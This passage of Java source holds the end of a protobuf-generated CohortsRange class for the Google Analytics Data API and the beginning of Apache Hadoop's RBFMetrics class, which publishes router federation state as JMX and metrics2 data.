`endOffset` can be any positive integer but is * commonly set to 5 to 10 so that reports contain data on the cohort for the * next several granularity time periods. * * If `granularity` is `DAILY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset` days. * * If `granularity` is `WEEKLY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset * 7` days. * * If `granularity` is `MONTHLY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset * 30` days. * </pre> * * <code>int32 end_offset = 3;</code> * * @return The endOffset. */ @java.lang.Override public int getEndOffset() { return endOffset_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (granularity_ != com.google.analytics.data.v1beta.CohortsRange.Granularity.GRANULARITY_UNSPECIFIED .getNumber()) { output.writeEnum(1, granularity_); } if (startOffset_ != 0) { output.writeInt32(2, startOffset_); } if (endOffset_ != 0) { output.writeInt32(3, endOffset_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (granularity_ != com.google.analytics.data.v1beta.CohortsRange.Granularity.GRANULARITY_UNSPECIFIED .getNumber()) { size += com.google.protobuf.CodedOutputStream.computeEnumSize(1, granularity_); } if (startOffset_ != 0) { size += com.google.protobuf.CodedOutputStream.computeInt32Size(2, startOffset_); } if (endOffset_ != 0) { size += com.google.protobuf.CodedOutputStream.computeInt32Size(3, endOffset_); } size += getUnknownFields().getSerializedSize(); 
// ---------------------------------------------------------------------------
// NOTE(review): tail of the protoc-generated message class
// com.google.analytics.data.v1beta.CohortsRange (the class header and field
// declarations precede this chunk). This is GENERATED CODE — do not hand-edit;
// regenerate from the .proto definition instead. Comments below were added
// for review readability only; all code tokens are unchanged.
// ---------------------------------------------------------------------------
memoizedSize = size; return size; }

  // Value equality over granularity, startOffset, endOffset and unknown fields.
  @java.lang.Override
  public boolean equals(final java.lang.Object obj) {
    if (obj == this) {
      return true;
    }
    if (!(obj instanceof com.google.analytics.data.v1beta.CohortsRange)) {
      return super.equals(obj);
    }
    com.google.analytics.data.v1beta.CohortsRange other =
        (com.google.analytics.data.v1beta.CohortsRange) obj;
    if (granularity_ != other.granularity_) return false;
    if (getStartOffset() != other.getStartOffset()) return false;
    if (getEndOffset() != other.getEndOffset()) return false;
    if (!getUnknownFields().equals(other.getUnknownFields())) return false;
    return true;
  }

  // Hash consistent with equals(); memoized because the message is immutable.
  @java.lang.Override
  public int hashCode() {
    if (memoizedHashCode != 0) {
      return memoizedHashCode;
    }
    int hash = 41;
    hash = (19 * hash) + getDescriptor().hashCode();
    hash = (37 * hash) + GRANULARITY_FIELD_NUMBER;
    hash = (53 * hash) + granularity_;
    hash = (37 * hash) + START_OFFSET_FIELD_NUMBER;
    hash = (53 * hash) + getStartOffset();
    hash = (37 * hash) + END_OFFSET_FIELD_NUMBER;
    hash = (53 * hash) + getEndOffset();
    hash = (29 * hash) + getUnknownFields().hashCode();
    memoizedHashCode = hash;
    return hash;
  }

  // Standard protobuf parse entry points: byte buffers, byte strings, byte
  // arrays, plain/delimited streams and coded streams, each with and without
  // an extension registry.
  public static com.google.analytics.data.v1beta.CohortsRange parseFrom(java.nio.ByteBuffer data)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }

  public static com.google.analytics.data.v1beta.CohortsRange parseFrom(
      java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }

  public static com.google.analytics.data.v1beta.CohortsRange parseFrom(
      com.google.protobuf.ByteString data)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }

  public static com.google.analytics.data.v1beta.CohortsRange parseFrom(
      com.google.protobuf.ByteString data,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }

  public static com.google.analytics.data.v1beta.CohortsRange parseFrom(byte[] data)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }

  public static com.google.analytics.data.v1beta.CohortsRange parseFrom(
      byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }

  public static com.google.analytics.data.v1beta.CohortsRange parseFrom(java.io.InputStream input)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input);
  }

  public static com.google.analytics.data.v1beta.CohortsRange parseFrom(
      java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3.parseWithIOException(
        PARSER, input, extensionRegistry);
  }

  public static com.google.analytics.data.v1beta.CohortsRange parseDelimitedFrom(
      java.io.InputStream input) throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input);
  }

  public static com.google.analytics.data.v1beta.CohortsRange parseDelimitedFrom(
      java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(
        PARSER, input, extensionRegistry);
  }

  public static com.google.analytics.data.v1beta.CohortsRange parseFrom(
      com.google.protobuf.CodedInputStream input) throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input);
  }

  public static com.google.analytics.data.v1beta.CohortsRange parseFrom(
      com.google.protobuf.CodedInputStream input,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3.parseWithIOException(
        PARSER, input, extensionRegistry);
  }

  @java.lang.Override
  public Builder newBuilderForType() {
    return newBuilder();
  }

  public static Builder newBuilder() {
    return DEFAULT_INSTANCE.toBuilder();
  }

  public static Builder newBuilder(com.google.analytics.data.v1beta.CohortsRange prototype) {
    return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype);
  }

  @java.lang.Override
  public Builder toBuilder() {
    return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this);
  }

  @java.lang.Override
  protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
    Builder builder = new Builder(parent);
    return builder;
  }

  /**
   * Configures the extended reporting date range for a cohort report. Specifies
   * an offset duration to follow the cohorts over.
   *
   * Protobuf type {@code google.analytics.data.v1beta.CohortsRange}
   */
  public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder>
      implements
      // @@protoc_insertion_point(builder_implements:google.analytics.data.v1beta.CohortsRange)
      com.google.analytics.data.v1beta.CohortsRangeOrBuilder {
    public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() {
      return com.google.analytics.data.v1beta.ReportingApiProto
          .internal_static_google_analytics_data_v1beta_CohortsRange_descriptor;
    }

    @java.lang.Override
    protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
        internalGetFieldAccessorTable() {
      return com.google.analytics.data.v1beta.ReportingApiProto
          .internal_static_google_analytics_data_v1beta_CohortsRange_fieldAccessorTable
          .ensureFieldAccessorsInitialized(
              com.google.analytics.data.v1beta.CohortsRange.class,
              com.google.analytics.data.v1beta.CohortsRange.Builder.class);
    }

    // Construct using com.google.analytics.data.v1beta.CohortsRange.newBuilder()
    private Builder() {}

    private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
      super(parent);
    }

    @java.lang.Override
    public Builder clear() {
      super.clear();
      bitField0_ = 0;
      granularity_ = 0;
      startOffset_ = 0;
      endOffset_ = 0;
      return this;
    }

    @java.lang.Override
    public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() {
      return com.google.analytics.data.v1beta.ReportingApiProto
          .internal_static_google_analytics_data_v1beta_CohortsRange_descriptor;
    }

    @java.lang.Override
    public com.google.analytics.data.v1beta.CohortsRange getDefaultInstanceForType() {
      return com.google.analytics.data.v1beta.CohortsRange.getDefaultInstance();
    }

    @java.lang.Override
    public com.google.analytics.data.v1beta.CohortsRange build() {
      com.google.analytics.data.v1beta.CohortsRange result = buildPartial();
      if (!result.isInitialized()) {
        throw newUninitializedMessageException(result);
      }
      return result;
    }

    @java.lang.Override
    public com.google.analytics.data.v1beta.CohortsRange buildPartial() {
      com.google.analytics.data.v1beta.CohortsRange result =
          new com.google.analytics.data.v1beta.CohortsRange(this);
      if (bitField0_ != 0) {
        buildPartial0(result);
      }
      onBuilt();
      return result;
    }

    // Copies only the fields whose presence bits are set in bitField0_.
    private void buildPartial0(com.google.analytics.data.v1beta.CohortsRange result) {
      int from_bitField0_ = bitField0_;
      if (((from_bitField0_ & 0x00000001) != 0)) {
        result.granularity_ = granularity_;
      }
      if (((from_bitField0_ & 0x00000002) != 0)) {
        result.startOffset_ = startOffset_;
      }
      if (((from_bitField0_ & 0x00000004) != 0)) {
        result.endOffset_ = endOffset_;
      }
    }

    @java.lang.Override
    public Builder clone() {
      return super.clone();
    }

    @java.lang.Override
    public Builder setField(
        com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) {
      return super.setField(field, value);
    }

    @java.lang.Override
    public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) {
      return super.clearField(field);
    }

    @java.lang.Override
    public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) {
      return super.clearOneof(oneof);
    }

    @java.lang.Override
    public Builder setRepeatedField(
        com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) {
      return super.setRepeatedField(field, index, value);
    }

    @java.lang.Override
    public Builder addRepeatedField(
        com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) {
      return super.addRepeatedField(field, value);
    }

    @java.lang.Override
    public Builder mergeFrom(com.google.protobuf.Message other) {
      if (other instanceof com.google.analytics.data.v1beta.CohortsRange) {
        return mergeFrom((com.google.analytics.data.v1beta.CohortsRange) other);
      } else {
        super.mergeFrom(other);
        return this;
      }
    }

    // Field-wise merge: only non-default values from `other` overwrite this builder.
    public Builder mergeFrom(com.google.analytics.data.v1beta.CohortsRange other) {
      if (other == com.google.analytics.data.v1beta.CohortsRange.getDefaultInstance()) return this;
      if (other.granularity_ != 0) {
        setGranularityValue(other.getGranularityValue());
      }
      if (other.getStartOffset() != 0) {
        setStartOffset(other.getStartOffset());
      }
      if (other.getEndOffset() != 0) {
        setEndOffset(other.getEndOffset());
      }
      this.mergeUnknownFields(other.getUnknownFields());
      onChanged();
      return this;
    }

    @java.lang.Override
    public final boolean isInitialized() {
      return true;
    }

    // Wire-format parse loop; tags 8/16/24 map to field numbers 1-3, anything
    // else is preserved in the unknown-field set.
    @java.lang.Override
    public Builder mergeFrom(
        com.google.protobuf.CodedInputStream input,
        com.google.protobuf.ExtensionRegistryLite extensionRegistry)
        throws java.io.IOException {
      if (extensionRegistry == null) {
        throw new java.lang.NullPointerException();
      }
      try {
        boolean done = false;
        while (!done) {
          int tag = input.readTag();
          switch (tag) {
            case 0:
              done = true;
              break;
            case 8:
              {
                granularity_ = input.readEnum();
                bitField0_ |= 0x00000001;
                break;
              } // case 8
            case 16:
              {
                startOffset_ = input.readInt32();
                bitField0_ |= 0x00000002;
                break;
              } // case 16
            case 24:
              {
                endOffset_ = input.readInt32();
                bitField0_ |= 0x00000004;
                break;
              } // case 24
            default:
              {
                if (!super.parseUnknownField(input, extensionRegistry, tag)) {
                  done = true; // was an endgroup tag
                }
                break;
              } // default:
          } // switch (tag)
        } // while (!done)
      } catch (com.google.protobuf.InvalidProtocolBufferException e) {
        throw e.unwrapIOException();
      } finally {
        onChanged();
      } // finally
      return this;
    }

    private int bitField0_;

    private int granularity_ = 0;

    // Required. The granularity used to interpret startOffset/endOffset.
    // <code>.google.analytics.data.v1beta.CohortsRange.Granularity granularity = 1;</code>
    @java.lang.Override
    public int getGranularityValue() {
      return granularity_;
    }

    public Builder setGranularityValue(int value) {
      granularity_ = value;
      bitField0_ |= 0x00000001;
      onChanged();
      return this;
    }

    @java.lang.Override
    public com.google.analytics.data.v1beta.CohortsRange.Granularity getGranularity() {
      com.google.analytics.data.v1beta.CohortsRange.Granularity result =
          com.google.analytics.data.v1beta.CohortsRange.Granularity.forNumber(granularity_);
      return result == null
          ? com.google.analytics.data.v1beta.CohortsRange.Granularity.UNRECOGNIZED
          : result;
    }

    public Builder setGranularity(com.google.analytics.data.v1beta.CohortsRange.Granularity value) {
      if (value == null) {
        throw new NullPointerException();
      }
      bitField0_ |= 0x00000001;
      granularity_ = value.getNumber();
      onChanged();
      return this;
    }

    public Builder clearGranularity() {
      bitField0_ = (bitField0_ & ~0x00000001);
      granularity_ = 0;
      onChanged();
      return this;
    }

    private int startOffset_;

    // startOffset: start of the extended reporting range, in granularity units
    // after the cohort's startDate (DAILY: days; WEEKLY: *7 days; MONTHLY: *30
    // days). Commonly 0 so reports start at cohort acquisition.
    // <code>int32 start_offset = 2;</code>
    @java.lang.Override
    public int getStartOffset() {
      return startOffset_;
    }

    public Builder setStartOffset(int value) {
      startOffset_ = value;
      bitField0_ |= 0x00000002;
      onChanged();
      return this;
    }

    public Builder clearStartOffset() {
      bitField0_ = (bitField0_ & ~0x00000002);
      startOffset_ = 0;
      onChanged();
      return this;
    }

    private int endOffset_;

    // Required. endOffset: end of the extended reporting range, in granularity
    // units after the cohort's endDate (any positive integer, commonly 5-10).
    // <code>int32 end_offset = 3;</code>
    @java.lang.Override
    public int getEndOffset() {
      return endOffset_;
    }

    public Builder setEndOffset(int value) {
      endOffset_ = value;
      bitField0_ |= 0x00000004;
      onChanged();
      return this;
    }

    public Builder clearEndOffset() {
      bitField0_ = (bitField0_ & ~0x00000004);
      endOffset_ = 0;
      onChanged();
      return this;
    }

    @java.lang.Override
    public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) {
      return super.setUnknownFields(unknownFields);
    }

    @java.lang.Override
    public final Builder mergeUnknownFields(
        final com.google.protobuf.UnknownFieldSet unknownFields) {
      return super.mergeUnknownFields(unknownFields);
    }

    // @@protoc_insertion_point(builder_scope:google.analytics.data.v1beta.CohortsRange)
  }

  // @@protoc_insertion_point(class_scope:google.analytics.data.v1beta.CohortsRange)
  private static final com.google.analytics.data.v1beta.CohortsRange DEFAULT_INSTANCE;

  static {
    DEFAULT_INSTANCE = new com.google.analytics.data.v1beta.CohortsRange();
  }

  public static com.google.analytics.data.v1beta.CohortsRange getDefaultInstance() {
    return DEFAULT_INSTANCE;
  }

  // Parser delegating to Builder.mergeFrom; attaches the partially-built
  // message to any parse failure for diagnostics.
  private static final com.google.protobuf.Parser<CohortsRange> PARSER =
      new com.google.protobuf.AbstractParser<CohortsRange>() {
        @java.lang.Override
        public CohortsRange parsePartialFrom(
            com.google.protobuf.CodedInputStream input,
            com.google.protobuf.ExtensionRegistryLite extensionRegistry)
            throws com.google.protobuf.InvalidProtocolBufferException {
          Builder builder = newBuilder();
          try {
            builder.mergeFrom(input, extensionRegistry);
          } catch (com.google.protobuf.InvalidProtocolBufferException e) {
            throw e.setUnfinishedMessage(builder.buildPartial());
          } catch (com.google.protobuf.UninitializedMessageException e) {
            throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial());
          } catch (java.io.IOException e) {
            throw new com.google.protobuf.InvalidProtocolBufferException(e)
                .setUnfinishedMessage(builder.buildPartial());
          }
          return builder.buildPartial();
        }
      };

  public static com.google.protobuf.Parser<CohortsRange> parser() {
    return PARSER;
  }

  @java.lang.Override
  public com.google.protobuf.Parser<CohortsRange> getParserForType() {
    return PARSER;
  }

  @java.lang.Override
  public com.google.analytics.data.v1beta.CohortsRange getDefaultInstanceForType() {
    return DEFAULT_INSTANCE;
  }
}
apache/hadoop
35,644
hadoop-hdfs-project/hadoop-hdfs-rbf/src/main/java/org/apache/hadoop/hdfs/server/federation/metrics/RBFMetrics.java
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.hdfs.server.federation.metrics; import static org.apache.hadoop.hdfs.server.federation.router.async.utils.AsyncUtil.syncReturn; import static org.apache.hadoop.metrics2.impl.MsInfo.ProcessName; import static org.apache.hadoop.util.Time.now; import java.io.IOException; import java.lang.reflect.Method; import java.math.BigInteger; import java.net.InetAddress; import java.net.InetSocketAddress; import java.net.UnknownHostException; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import java.util.Collections; import java.util.Date; import java.util.HashMap; import java.util.HashSet; import java.util.LinkedHashMap; import java.util.LinkedHashSet; import java.util.LinkedList; import java.util.List; import java.util.Map; import java.util.Set; import java.util.concurrent.TimeUnit; import java.util.function.Function; import java.util.function.ToIntFunction; import java.util.function.ToLongFunction; import java.util.stream.Collectors; import javax.management.NotCompliantMBeanException; import javax.management.ObjectName; import javax.management.StandardMBean; import 
org.apache.commons.math3.stat.descriptive.moment.StandardDeviation; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.hdfs.protocol.DatanodeInfo; import org.apache.hadoop.hdfs.protocol.HdfsConstants.DatanodeReportType; import org.apache.hadoop.hdfs.server.federation.resolver.ActiveNamenodeResolver; import org.apache.hadoop.hdfs.server.federation.resolver.FederationNamenodeContext; import org.apache.hadoop.hdfs.server.federation.resolver.FederationNamespaceInfo; import org.apache.hadoop.hdfs.server.federation.resolver.RemoteLocation; import org.apache.hadoop.hdfs.server.federation.router.RBFConfigKeys; import org.apache.hadoop.hdfs.server.federation.router.Router; import org.apache.hadoop.hdfs.server.federation.router.RouterRpcServer; import org.apache.hadoop.hdfs.server.federation.router.RouterServiceState; import org.apache.hadoop.hdfs.server.federation.router.security.RouterSecurityManager; import org.apache.hadoop.hdfs.server.federation.store.MembershipStore; import org.apache.hadoop.hdfs.server.federation.store.MountTableStore; import org.apache.hadoop.hdfs.server.federation.store.RouterStore; import org.apache.hadoop.hdfs.server.federation.store.StateStoreService; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetMountTableEntriesRequest; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetMountTableEntriesResponse; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetNamenodeRegistrationsRequest; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetNamenodeRegistrationsResponse; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetNamespaceInfoRequest; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetNamespaceInfoResponse; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetRouterRegistrationsRequest; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetRouterRegistrationsResponse; import 
org.apache.hadoop.hdfs.server.federation.store.records.BaseRecord;
import org.apache.hadoop.hdfs.server.federation.store.records.MembershipState;
import org.apache.hadoop.hdfs.server.federation.store.records.MembershipStats;
import org.apache.hadoop.hdfs.server.federation.store.records.MountTable;
import org.apache.hadoop.hdfs.server.federation.store.records.RouterState;
import org.apache.hadoop.hdfs.server.federation.store.records.StateStoreVersion;
import org.apache.hadoop.hdfs.web.JsonUtil;
import org.apache.hadoop.metrics2.MetricsSystem;
import org.apache.hadoop.metrics2.annotation.Metric;
import org.apache.hadoop.metrics2.annotation.Metrics;
import org.apache.hadoop.metrics2.lib.DefaultMetricsSystem;
import org.apache.hadoop.metrics2.lib.MetricsRegistry;
import org.apache.hadoop.metrics2.util.MBeans;
import org.apache.hadoop.metrics2.util.Metrics2Util;
import org.apache.hadoop.security.UserGroupInformation;
import org.apache.hadoop.util.StringUtils;
import org.apache.hadoop.util.VersionInfo;
import org.codehaus.jettison.json.JSONObject;
import org.eclipse.jetty.util.ajax.JSON;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.apache.hadoop.classification.VisibleForTesting;

/**
 * Implementation of the Router metrics collector.
 *
 * Publishes Router Based Federation state both as JMX beans (RouterMBean and
 * FederationMBean) and as metrics2 gauges. Most getters read from the State
 * Store record stores and serialize the result to JSON strings for JMX.
 */
@Metrics(name="RBFActivity", about="RBF metrics", context="dfs")
public class RBFMetrics implements RouterMBean, FederationMBean {

  private static final Logger LOG =
      LoggerFactory.getLogger(RBFMetrics.class);

  private final MetricsRegistry registry = new MetricsRegistry("RBFMetrics");

  /** Format for a date. */
  private static final String DATE_FORMAT = "yyyy/MM/dd HH:mm:ss";

  /** Prevent holding the page from load too long. */
  private final long timeOut;
  /** Enable/Disable getNodeUsage. **/
  private boolean enableGetDNUsage;

  /** Router interface. */
  private final Router router;
  /** FederationState JMX bean. */
  // NOTE(review): routerBeanName is the "Router" bean; federationBeanName is
  // the "FederationState" bean registered in the constructor below.
  private ObjectName routerBeanName;
  private ObjectName federationBeanName;

  /** Resolve the namenode for each namespace. */
  private final ActiveNamenodeResolver namenodeResolver;

  /** State store. */
  private final StateStoreService stateStore;
  /** Membership state store. */
  private MembershipStore membershipStore;
  /** Mount table store. */
  private MountTableStore mountTableStore;
  /** Router state store. */
  private RouterStore routerStore;

  /** The number of top token owners reported in metrics. */
  private int topTokenRealOwners;

  /**
   * Builds the metrics collector for a Router: registers the two JMX beans,
   * resolves the State Store record stores (may be unavailable), reads the
   * relevant configuration keys and registers this source with metrics2.
   *
   * @param router Router this collector reports on.
   * @throws IOException If the metrics cannot be initialized.
   */
  public RBFMetrics(Router router) throws IOException {
    this.router = router;
    try {
      StandardMBean bean = new StandardMBean(this, RouterMBean.class);
      this.routerBeanName = MBeans.register("Router", "Router", bean);
      LOG.info("Registered Router MBean: {}", this.routerBeanName);
    } catch (NotCompliantMBeanException e) {
      throw new RuntimeException("Bad Router MBean setup", e);
    }
    try {
      StandardMBean bean = new StandardMBean(this, FederationMBean.class);
      this.federationBeanName = MBeans.register("Router", "FederationState", bean);
      LOG.info("Registered FederationState MBean: {}", this.federationBeanName);
    } catch (NotCompliantMBeanException e) {
      throw new RuntimeException("Bad FederationState MBean setup", e);
    }

    // Resolve namenode for each nameservice
    this.namenodeResolver = this.router.getNamenodeResolver();

    // State store interfaces
    this.stateStore = this.router.getStateStore();
    if (this.stateStore == null) {
      // The JSON getters below degrade to "{}"/"[]" when stores are null.
      LOG.error("State store not available");
    } else {
      this.membershipStore = stateStore.getRegisteredRecordStore(
          MembershipStore.class);
      this.mountTableStore = stateStore.getRegisteredRecordStore(
          MountTableStore.class);
      this.routerStore = stateStore.getRegisteredRecordStore(
          RouterStore.class);
    }

    // Initialize the cache for the DN reports
    Configuration conf = router.getConfig();
    this.timeOut = conf.getTimeDuration(RBFConfigKeys.DN_REPORT_TIME_OUT,
        RBFConfigKeys.DN_REPORT_TIME_OUT_MS_DEFAULT, TimeUnit.MILLISECONDS);
    this.enableGetDNUsage =
        conf.getBoolean(RBFConfigKeys.DFS_ROUTER_ENABLE_GET_DN_USAGE_KEY,
            RBFConfigKeys.DFS_ROUTER_ENABLE_GET_DN_USAGE_DEFAULT);
    this.topTokenRealOwners = conf.getInt(
        RBFConfigKeys.DFS_ROUTER_METRICS_TOP_NUM_TOKEN_OWNERS_KEY,
        RBFConfigKeys.DFS_ROUTER_METRICS_TOP_NUM_TOKEN_OWNERS_KEY_DEFAULT);

    registry.tag(ProcessName, "Router");
    MetricsSystem ms = DefaultMetricsSystem.instance();
    ms.register(RBFMetrics.class.getName(), "RBFActivity Metrics", this);
  }

  // Test hook to toggle the (potentially expensive) datanode-report path.
  @VisibleForTesting
  public void setEnableGetDNUsage(boolean enableGetDNUsage) {
    this.enableGetDNUsage = enableGetDNUsage;
  }

  /**
   * Unregister the JMX beans.
   */
  public void close() {
    if (this.routerBeanName != null) {
      MBeans.unregister(routerBeanName);
    }
    if (this.federationBeanName != null) {
      MBeans.unregister(federationBeanName);
    }
    MetricsSystem ms = DefaultMetricsSystem.instance();
    ms.unregisterSource(RBFMetrics.class.getName());
  }

  // Returns a JSON map of all namenode registrations keyed by namenode key,
  // or "{}" when the membership store is unavailable or the query fails.
  @Override
  public String getNamenodes() {
    final Map<String, Map<String, Object>> info = new LinkedHashMap<>();
    if (membershipStore == null) {
      return "{}";
    }
    try {
      // Get the values from the store
      GetNamenodeRegistrationsRequest request =
          GetNamenodeRegistrationsRequest.newInstance();
      GetNamenodeRegistrationsResponse response =
          membershipStore.getNamenodeRegistrations(request);

      // Order the namenodes
      final List<MembershipState> namenodes = response.getNamenodeMemberships();
      if (namenodes == null || namenodes.size() == 0) {
        return JSON.toString(info);
      }
      List<MembershipState> namenodesOrder = new ArrayList<>(namenodes);
      Collections.sort(namenodesOrder, MembershipState.NAME_COMPARATOR);

      // Dump namenodes information into JSON
      for (MembershipState namenode : namenodesOrder) {
        Map<String, Object> innerInfo = new HashMap<>();
        Map<String, Object> map = getJson(namenode);
        innerInfo.putAll(map);
        long dateModified = namenode.getDateModified();
        long lastHeartbeat = getSecondsSince(dateModified);
        innerInfo.put("lastHeartbeat", lastHeartbeat);
        MembershipStats stats = namenode.getStats();
        long used = stats.getTotalSpace() - stats.getAvailableSpace();
        innerInfo.put("used", used);
        info.put(namenode.getNamenodeKey(),
            Collections.unmodifiableMap(innerInfo));
      }
    } catch (IOException e) {
      // TODO(review): typo in the log message — should read "Unable to fetch
      // json representation of namenodes {}".
      LOG.error("Enable to fetch json representation of namenodes {}",
          e.getMessage());
      return "{}";
    }
    return JSON.toString(info);
  }

  // Same shape as getNamenodes() but restricted to the active namenode
  // registration of each nameservice.
  @Override
  public String getNameservices() {
    final Map<String, Map<String, Object>> info = new LinkedHashMap<>();
    try {
      final List<MembershipState> namenodes = getActiveNamenodeRegistrations();
      List<MembershipState> namenodesOrder = new ArrayList<>(namenodes);
      Collections.sort(namenodesOrder, MembershipState.NAME_COMPARATOR);

      // Dump namenodes information into JSON
      for (MembershipState namenode : namenodesOrder) {
        Map<String, Object> innerInfo = new HashMap<>();
        Map<String, Object> map = getJson(namenode);
        innerInfo.putAll(map);
        long dateModified = namenode.getDateModified();
        long lastHeartbeat = getSecondsSince(dateModified);
        innerInfo.put("lastHeartbeat", lastHeartbeat);
        MembershipStats stats = namenode.getStats();
        long used = stats.getTotalSpace() - stats.getAvailableSpace();
        innerInfo.put("used", used);
        info.put(namenode.getNamenodeKey(),
            Collections.unmodifiableMap(innerInfo));
      }
    } catch (IOException e) {
      LOG.error("Cannot retrieve nameservices for JMX: {}", e.getMessage());
      return "{}";
    }
    return JSON.toString(info);
  }

  // Returns the mount table entries as a JSON array ordered by source path,
  // or "[]" when the mount table store is unavailable or the query fails.
  @Override
  public String getMountTable() {
    final List<Map<String, Object>> info = new LinkedList<>();
    if (mountTableStore == null) {
      return "[]";
    }
    try {
      // Get all the mount points in order
      GetMountTableEntriesRequest request =
          GetMountTableEntriesRequest.newInstance("/");
      GetMountTableEntriesResponse response =
          mountTableStore.getMountTableEntries(request);
      final List<MountTable> mounts = response.getEntries();
      List<MountTable> orderedMounts = new ArrayList<>(mounts);
      Collections.sort(orderedMounts, MountTable.SOURCE_COMPARATOR);

      // Dump mount table entries information into JSON
      for (MountTable entry : orderedMounts) {
        // Summarize destinations
        Set<String> nameservices = new LinkedHashSet<>();
        Set<String> paths = new LinkedHashSet<>();
        for (RemoteLocation location : entry.getDestinations()) {
          nameservices.add(location.getNameserviceId());
          paths.add(location.getDest());
        }

        Map<String, Object> map = getJson(entry);
        // We add some values with a cleaner format
        map.put("dateCreated", getDateString(entry.getDateCreated()));
        map.put("dateModified", getDateString(entry.getDateModified()));

        Map<String, Object> innerInfo = new HashMap<>();
        innerInfo.putAll(map);
        innerInfo.put("nameserviceId", StringUtils.join(",", nameservices));
        innerInfo.put("path", StringUtils.join(",", paths));
        // The destination order is only meaningful with multiple nameservices.
        if (nameservices.size() > 1) {
          innerInfo.put("order", entry.getDestOrder().toString());
        } else {
          innerInfo.put("order", "");
        }
        innerInfo.put("readonly", entry.isReadOnly());
        innerInfo.put("faulttolerant", entry.isFaultTolerant());
        info.add(Collections.unmodifiableMap(innerInfo));
      }
    } catch (IOException e) {
      LOG.error(
          "Cannot generate JSON of mount table from store: {}", e.getMessage());
      return "[]";
    }
    return JSON.toString(info);
  }

  // Returns a JSON map of all registered Routers keyed by their primary key,
  // or "{}" when the router store is unavailable or the query fails.
  @Override
  public String getRouters() {
    final Map<String, Map<String, Object>> info = new LinkedHashMap<>();
    if (routerStore == null) {
      return "{}";
    }
    try {
      // Get all the routers in order
      GetRouterRegistrationsRequest request =
          GetRouterRegistrationsRequest.newInstance();
      GetRouterRegistrationsResponse response =
          routerStore.getRouterRegistrations(request);
      final List<RouterState> routers = response.getRouters();
      List<RouterState> routersOrder = new ArrayList<>(routers);
      Collections.sort(routersOrder);

      // Dump router information into JSON
      for (RouterState record : routersOrder) {
        Map<String, Object> innerInfo = new HashMap<>();
        Map<String, Object> map = getJson(record);
        innerInfo.putAll(map);
        long dateModified = record.getDateModified();
        long lastHeartbeat = getSecondsSince(dateModified);
        innerInfo.put("lastHeartbeat", lastHeartbeat);
        StateStoreVersion stateStoreVersion = record.getStateStoreVersion();
        if (stateStoreVersion == null) {
          LOG.error("Cannot get State Store versions");
        } else {
